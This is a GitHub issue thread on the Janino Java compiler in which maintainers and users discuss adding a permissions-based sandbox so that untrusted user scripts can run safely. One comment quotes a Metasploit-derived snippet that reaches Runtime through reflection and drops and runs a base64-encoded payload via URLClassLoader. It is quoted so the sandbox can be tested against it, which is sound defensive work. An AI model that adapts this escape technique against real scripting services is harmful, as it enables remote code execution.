### ISSUE TITLE
High security mode

### ISSUE THREAD

**Issue by karussell** [janino-compiler/janino#9]
Thanks for your library!

Regarding security the documentation says:
*JANINO has full access to the JRE, security problems can arise if the expression, script, class body or compilation being compiled and executed contains user input.*

I can imagine that the input is very often a user input and then defaults should be something like 'let access only to helper classes', e.g. just allow mathematical operations, Math.* and a list of allowed classes.

The docs says that this can be fixed with de.unkrig.commons.lang.security.Sandboxcode. Wouldn't it make sense to provide this inbuilt maybe as the default option? Or with a simple config call
`new ScriptEvaluator(restrictedEnvironment=true)`? Or how would I configure the sandbox for this very restricted environment? Is there some more documentation about this than [the javadocs](http://commons.unkrig.de/javadoc/commons-lang/index.html)?

They reason I ask this is that I'm considering to include this library in a project (due to its simplicity) but have heard that e.g. ElasticSearch [had lots of security problems](https://packetstormsecurity.com/files/130799/search_groovy_script.rb.txt) due to its [powerful scripting](https://www.elastic.co/blog/running-groovy-scripts-without-dynamic-scripting). So they moved from [mvel to groovy](https://www.elastic.co/blog/scripting) and then finally [moved to some handwritten expression library Painless](https://www.elastic.co/guide/en/elasticsearch/reference/5.0/modules-scripting-painless.html) with 'proper' security.

**Comment by aunkrig** [comment]
I would not trust any homebrew sandbox, only the Java sandbox, which is being tested throughout the last twenty years. I wrote [a set of test cases](https://github.com/janino-compiler/janino/blob/master/commons-compiler-tests/src/test/java/org/codehaus/commons/compiler/tests/DuclsSandboxTest.java), and it seems that the de.unkrig.commons.lang.security.Sandbox is pretty airtight.

I agree; it would definitely make sense to integrate security into the commons-compiler API. I envisage something like

    ISimpleCompiler.setPermissions(Permissions)
    ISimpleCompiler.setNoPermissions()

, where the latter is short for

    ISimpleCompiler.setPermissions(new Permissions())

What do you think about this design?

**Comment by aunkrig** [comment]
I just implemented "ISimpleCompiler.setPermissions()" (without awaiting your answer). I believe it's really simple and clear to use!

Please review.

**Comment by karussell** [comment]
Nice & Thanks!

Would you mind adding a simple unit test which shows the usage of janino with this new feature? (or refactor the existing test?)

And with "no permissions" I could still use the Math utilities and do calculation, right? (Sorry for those stupid questions, but although I'm not a newbie, I never really dealt with permissions in Java)

**Comment by aunkrig** [comment]
I already wrote a set of test cases:
https://github.com/janino-compiler/janino/blob/master/commons-compiler-tests/src/test/java/org/codehaus/commons/compiler/tests/DuclsSandboxTest.java

Well, I'm not exactly sure which actions are guarded by the security manager, but "Math" is very probably not.

Enjoy!

**Comment by aunkrig** [comment]
The JRE declares the following permissions, which gives a good idea about which operations are guarded:

- java.security.Permission
  - java.security.AllPermission
  - java.security.BasicPermission
    - javax.sound.sampled.AudioPermission
    - javax.security.auth.AuthPermission
    - java.awt.AWTPermission
    - javax.security.auth.kerberos.DelegationPermission
    - javax.xml.bind.JAXBPermission
    - java.nio.file.LinkPermission
    - java.util.logging.LoggingPermission
    - java.lang.management.ManagementPermission
    - javax.management.MBeanServerPermission
    - javax.management.MBeanTrustPermission
    - java.net.NetPermission
    - java.util.PropertyPermission
    - java.lang.reflect.ReflectPermission
    - java.lang.RuntimePermission
    - java.security.SecurityPermission
    - java.io.SerializablePermission
    - java.sql.SQLPermission
    - javax.net.ssl.SSLPermission
    - javax.management.remote.SubjectDelegationPermission
    - javax.xml.ws.WebServicePermission
  - java.io.FilePermission
  - javax.management.MBeanPermission
  - javax.security.auth.PrivateCredentialPermission
  - javax.security.auth.kerberos.ServicePermission
  - java.net.SocketPermission
  - java.security.UnresolvedPermission
  - java.net.URLPermission

"Math" is not listed, so I reckon that it is not guarded.

**Comment by aunkrig** [comment]
This book also shows an (obviously incomplete) list of guarded actions:
http://www.informit.com/articles/article.aspx?p=1187967&seqNum=3

**Comment by aunkrig** [comment]
Here's another list:
http://www.javaworld.com/article/2077067/core-java/java-security---how-to-install-the-security-manager-and-customize-your-security-policy.html

Unforgivable there is no official documentation abouch guarded actions!?

**Comment by aunkrig** [comment]
Luckily, "Thread()" does some reflection, so thread creation by scripts can be prevented by not allowing "new RuntimePermission("accessDeclaredMembers")".

**Comment by aunkrig** [comment]
`com.sun.management.ThreadMXBean.getThreadAllocatedBytes()` appears to count the bytes ever allocated by the thread, and may thus be a good measure to detect excessive memory allocation by a running script.

**Comment by karussell** [comment]
So instead of empty permission I would need to add this Thread permission to avoid hacking the security restrictions?

**Comment by karussell** [comment]
Can you try the hack listed here: https://packetstormsecurity.com/files/130799/search_groovy_script.rb.txt
```txt
class = java.lang.Math.class.forName("java.lang.Runtime");
```
```
 java = [
      'c=java.lang.Math.class.forName("java.io.FileOutputStream");',
      'b64=java.lang.Math.class.forName("sun.misc.BASE64Decoder");',
      "i=c.getDeclaredConstructor(String.class).newInstance(\"#{tmp_file}\");",
      'b64_i=b64.newInstance();',
      "i.write(b64_i.decodeBuffer(\"#{Rex::Text.encode_base64(payload.encoded)}\"));",
      'loader_class=java.lang.Math.class.forName("java.net.URLClassLoader");',
      'file_class=java.lang.Math.class.forName("java.io.File");',
      "file_url=file_class.getDeclaredConstructor(String.class).newInstance(\"#{tmp_file}\").toURI().toURL();",
      'loader=loader_class.newInstance();',
      'loader.addURL(file_url);',
      'm=loader.loadClass(\'metasploit.Payload\');',
      'm.main(null);'
    ]

    java.join
```

**Comment by aunkrig** [comment]
`setNoPermissions()` forbids `new RuntimePermission("accessDeclaredMembers")` and thus the script/expression cannot create new Threads.

**Comment by karussell** [comment]
Thanks! From my understandings this looks all safe now :)

But still have trouble to understand the wording of ElasticSearch, where [they say](https://www.elastic.co/blog/elasticsearch-1-4-3-and-1-3-8-released): *Unfortunately, after discussing the issue with the Groovy team, we have come to the conclusion that the Groovy language is too dynamic to be properly contained by a sandbox.*

Will your sandbox make janino safe against an attack like sketched [here](https://github.com/Svti/ElasticSearchEXP/blob/master/src/org/vti/service/impl/ESGroovyServiceImpl.java)? 

From my understanding your sandbox would also work for Groovy (?), so somehow here is a contradiction.

**Comment by aunkrig** [comment]
Well, I'm not 100% sure what [this](https://github.com/Svti/ElasticSearchEXP/blob/master/src/org/vti/service/impl/ESGroovyServiceImpl.java) means, but it seems like someone's creating a `FileOutputStream` through REFLECTION. I assume that the GROOVY sandbox attempts to prevent *direct* creation of files by forbidding the use of the `java.io classes`, and this turns out to be a BAD concept. One more "homebrew" sandbox, as I called it above.
`setNoPermissions()` would definitely prevent that. Take my advice: Don't write your own sandbox, don't trust anybody else's sandbox (including GROOVY's), only the JRE security manager. The best guarantee you can get.

**Comment by MattJohns** [comment]
Is it possible to give lower security to dynamic code loaded through JavaSourceClassLoader?  What if the current security manager (out of my control) cannot be replaced at run time?

**Comment by aunkrig** [comment]
@MattJohns 

> Is it possible to give lower security to dynamic code loaded through JavaSourceClassLoader?

Just call `Sandbox.confine(myJscl, ...)`.

> What if the current security manager (out of my control) cannot be replaced at run time?

Then you cannot use the `Sandbox` :-( . However the `Sandbox` uses the *previously* installed `SecurityManager` and only *adds* more security checks. So it should be possible to use the `Sandbox` together with a previously installed `SecurityManager`. Have you tried that?

**Comment by aunkrig** [comment]
@MattJohns 
Also, please do not add new questions to existing issues; it is always better to create a new issue.

**Comment by karussell** [comment]
> However the Sandbox uses the previously installed SecurityManager and only adds more security checks.

A custom SecurityManager restricts the things the code can do and a PrivilegedExceptionAction (or PrivilegedAction) can only allow operations that are usually not allowed. At least this is my (currently very limited) understanding. So the documentation is IMO also a bit misleading:

>  JANINO includes a very easy-to-use security API, which can be used to lock expressions, scripts, class bodies and compilation units into a "sandbox", which is guarded by a Java security manager: 

A call to `System.setSecurityManager(new SecurityManager())` already locks expressions (scripts etc) and you can then use the Sandbox to remove certain restrictions and e.g. delete files which is not allowed from the currently installed SecurityManager (that makes also sense from the naming perspective "privileged" and adding permissions).

**Comment by aunkrig** [comment]
Could you please demonstrate how I establish a second codebase and a second security manager?

**Comment by karussell** [comment]
Ha, this is a very good question :) ... in practise you can look into code from Elasticsearch and how they do this but I'm currently struggling how they do this in detail. In (my!) theory it works like this:

 * create a jar where janino is bundled
 * load that jar via something like the ServiceLoader (I think ElasticSearch uses its own class loading mechanism)
 * define a separate policy for this jar file see e.g. [here](https://github.com/elastic/elasticsearch/blob/master/modules/lang-painless/src/main/plugin-metadata/plugin-security.policy) and as you can see [in other examples](https://docs.oracle.com/javase/8/docs/technotes/guides/security/PolicyFiles.html) one can define the "codeBase" to point to a certain jar location. I'm unsure why "codeBase" is empty here probably because this is defined on demand somehow.

See also:
 * https://www.elastic.co/guide/en/elasticsearch/plugins/6.8/plugin-authors.html

**Comment by angularbyrk** [comment]
Hi, thanks for this great codebase. I am trying to use it in my project. I try to use the string-based resource and I can compile and execute it. now I want to apply some permissions to the compiler. but the method is not available. is it removed?
